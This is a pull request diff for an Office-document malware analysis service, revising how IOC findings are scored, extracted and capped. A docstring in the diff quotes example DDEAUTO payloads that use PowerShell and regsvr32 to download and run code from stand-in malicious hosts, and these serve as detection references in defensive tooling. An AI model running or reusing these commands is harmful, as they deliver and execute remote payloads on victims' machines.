### PR TITLE
Al 1007 oletools overscoring iocs

### DIFF
--- a/oletools_/oletools_.py
+++ b/oletools_/oletools_.py
@@ -146,7 +146,7 @@ class Oletools(ServiceBase):
         Returns:
             AL result object and whether entity should be extracted (boolean).
         """
-        extract = 0
+        extract = False
         ioc_res = None
         score = 0
 
@@ -170,7 +170,7 @@ class Oletools(ServiceBase):
                             continue
                         else:
                             # Determine if entity should be extracted
-                            extract += self.decide_extract(ty, asc_asc)
+                            extract = extract or self.decide_extract(ty, asc_asc)
                             score += 1
 
                             ioc_res.add_line(f"Found the following {ty.rsplit('.', 1)[-1].upper()} string:")
@@ -187,7 +187,7 @@ class Oletools(ServiceBase):
                                 if isinstance(v, bytes):
                                     v = safe_str(v)
 
-                                extract += self.decide_extract(ty, v)
+                                extract = extract or self.decide_extract(ty, v)
                                 score += 1
                                 val_list.append(v)
                                 ioc_res.add_tag(ty, v)
@@ -206,10 +206,6 @@ class Oletools(ServiceBase):
                         ioc_res.set_heuristic(36)
                     else:
                         ioc_res.set_heuristic(37)
-            if extract == 0:
-                extract = False
-            else:
-                extract = True
 
         return ioc_res, extract
 
@@ -390,7 +386,8 @@ class Oletools(ServiceBase):
                 request.result.add_section(section)
 
         if self.excess_extracted:
-            self.log.error(f"Too many files extracted for sample {self.sha}. {len(self.excess_extracted)} files were not extracted")
+            self.log.error(f"Too many files extracted for sample {self.sha}."
+                           f" {len(self.excess_extracted)} files were not extracted")
         # score_check = 0
         # for section in self.ole_result.sections:
         #     score_check += self.calculate_nested_scores(section)
@@ -545,7 +542,7 @@ class Oletools(ServiceBase):
                         xml_big_res.add_line(f'{f}')
                         xml_big_res.heuristic.increment_frequency()
                     zip_uris.extend(template_re.findall(data))
-                    
+
                     # Extract all files with external targets
                     external = external_re.search(data)
 
@@ -561,9 +558,9 @@ class Oletools(ServiceBase):
                     if f_b64res:
                         f_b64res.set_heuristic(8)
                         xml_b64_res.add_subsection(f_b64res)
-                    extract_xml = extract_ioc + extract_b64
 
-                    if (extract_xml > 0 or external) and not f.endswith("vbaProject.bin"):  # all vba extracted anyways
+                    # all vba extracted anyways
+                    if (extract_ioc or extract_b64 or external) and not f.endswith("vbaProject.bin"):
                         xml_sha256 = hashlib.sha256(data).hexdigest()
                         if xml_sha256 not in xml_extracted:
                             xml_file_path = os.path.join(self.working_directory, xml_sha256)
@@ -930,12 +927,12 @@ class Oletools(ServiceBase):
         """ typical results look like this:
         DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell
         \\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden -C $e=(new-object system.net.webclient).downloadstring
-        ('http://bad.ly/Short');powershell.exe -e $e # " "Legit.docx" 
-        DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden 
-        $e=(New-Object System.Net.WebClient).DownloadString('http://203.0.113.111/payroll.ps1');powershell 
+        ('http://bad.ly/Short');powershell.exe -e $e # " "Legit.docx"
+        DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden
+        $e=(New-Object System.Net.WebClient).DownloadString('http://203.0.113.111/payroll.ps1');powershell
         -Command $e"
-        DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe" 
-        "/c regsvr32 /u /n /s /i:\"h\"t\"t\"p://downloads.bad.com/file scrobj.dll" "For Security Reasons" 
+        DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe"
+        "/c regsvr32 /u /n /s /i:\"h\"t\"t\"p://downloads.bad.com/file scrobj.dll" "For Security Reasons"
         """
 
         # To date haven't seen a sample with multiple links yet but it should be possible..
@@ -1645,14 +1642,14 @@ class Oletools(ServiceBase):
 
                     # Finally look for other IOC patterns, will ignore SRP streams for now
                     if self.patterns and not re.match(r'__SRP_[0-9]*', stream):
-                        ole_ioc_res, extract = self.check_for_patterns(data, stream)
+                        ole_ioc_res, _ = self.check_for_patterns(data, stream)
                         if ole_ioc_res:
                             if not ole_ioc_res.heuristic:
                                 ole_ioc_res.set_heuristic(9)
                             extract_stream = True
                             sus_res = True
                             sus_sec.add_subsection(ole_ioc_res)
-                    ole_b64_res, extract = self.check_for_b64(data, stream)
+                    ole_b64_res, _ = self.check_for_b64(data, stream)
                     if ole_b64_res:
                         ole_b64_res.set_heuristic(10)
                         extract_stream = True

--- a/oletools_/oletools_.py
+++ b/oletools_/oletools_.py
@@ -568,7 +568,7 @@ class Oletools(ServiceBase):
         if xml_ioc_res.tags:
             for tag_type, tags in xml_ioc_res.tags.items():
                 for tag in tags:
-                    xml_ioc_res.add_line(f"Found the {tag_type} string {tag} in:")
+                    xml_ioc_res.add_line(f"Found the {tag_type.rsplit('.',1)[-1].upper()} string {tag} in:")
                     xml_ioc_res.add_lines(ioc_files[tag_type+tag])
                     xml_ioc_res.add_line('')
                     xml_ioc_res.heuristic.increment_frequency()
@@ -1607,7 +1607,7 @@ class Oletools(ServiceBase):
                         ole_ioc_res.set_heuristic(9)
                         ole_ioc_res.heuristic.frequency = 0
                         iocs, extract_stream = self.check_for_patterns(data)
-                        for tag_type, tags in iocs:
+                        for tag_type, tags in iocs.items():
                             ole_ioc_res.add_line(
                                 f"Found the following {tag_type.rsplit('.', 1)[-1].upper()} string(s):")
                             ole_ioc_res.add_line('  |  '.join(tags))

--- a/oletools_/oletools_.py
+++ b/oletools_/oletools_.py
@@ -370,10 +370,10 @@ class Oletools(ServiceBase):
             self.check_for_indicators(path)
             self.check_for_dde_links(path)
             self.check_for_macros(path, file_contents, request.sha256)
-            self.check_xml_strings(path)
             self.rip_mhtml(file_contents)
             self.extract_streams(path, file_contents)
             self.create_macro_sections(request.sha256)
+            self.check_xml_strings(path)
         except Exception as e:
             self.log.error(f"We have encountered a critical error for sample {self.sha}: {str(e)}")
 
@@ -551,6 +551,7 @@ class Oletools(ServiceBase):
                         if not f_iocres.heuristic:
                             f_iocres.set_heuristic(7)
                         xml_ioc_res.add_subsection(f_iocres)
+
                     f_b64res, extract_b64 = self.check_for_b64(data, f)
                     if f_b64res:
                         f_b64res.set_heuristic(8)

--- a/service_manifest.yml
+++ b/service_manifest.yml
@@ -68,7 +68,8 @@ heuristics:
 
   - heur_id: 7
     name: IOC in XML
-    score: 0
+    score: 1
+    max_score: 100
     filetype: document/office
     description: IOC content discovered in compressed XML.
 
@@ -80,7 +81,8 @@ heuristics:
 
   - heur_id: 9
     name: IOC in OLE
-    score: 0
+    score: 1
+    max_score: 100
     filetype: document/office
     description: IOC content discovered in OLE Object.
 

--- a/service_manifest.yml
+++ b/service_manifest.yml
@@ -224,24 +224,6 @@ heuristics:
     filetype: document/office
     description: OleID indicator object found
 
-  - heur_id: 35
-    name: IOCs found (1-5)
-    score: 5
-    filetype: document/office
-    description: IOCs found (1-5)
-
-  - heur_id: 36
-    name: IOCs found (6-10)
-    score: 10
-    filetype: document/office
-    description: IOCs found (6-10)
-
-  - heur_id: 37
-    name: IOCs found (10+)
-    score: 20
-    filetype: document/office
-    description: IOCs found (10+)
-
   - heur_id: 38
     name: Attached External Template Targets in XML
     score: 500


### PR DESCRIPTION
Oletools now scores IOCs per unique IOC rather than per instance of IOC in files and capped at 100.
Pattern searching code is simplified and whitelist patterns are fixed.